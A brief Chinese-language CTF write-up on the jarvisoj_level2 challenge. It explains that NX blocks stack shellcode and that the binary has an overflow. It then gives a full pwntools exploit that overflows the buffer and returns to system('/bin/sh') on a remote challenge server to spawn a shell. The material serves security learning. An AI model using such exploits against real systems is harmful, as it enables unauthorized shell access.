jarvisoj_level2

开了nx保护 ，也就是栈不可执行，这里可以解释一下，其实就是站里面不可以直接用shellcode直接生成。

这里的echo就是输出

看这里，是有溢出的

点击查看代码

from pwn import *
context.log_level='debug'
elf=ELF("./level2")
#io=process("./level2")
io=remote('node4.buuoj.cn',25168)
sys_addr=elf.symbols['system']
bin_sh_addr=elf.search('/bin/sh').next()
payload='a'*(0x88+4)+p32(sys_addr)+p32(1)+p32(bin_sh_addr)
io.sendline(payload)
io.interactive()

sys_addr=elf.symbols['system'] bin_sh_addr=elf.search('/bin/sh').next() 还是这两句还要记录一下，一个找函数，一个找字符。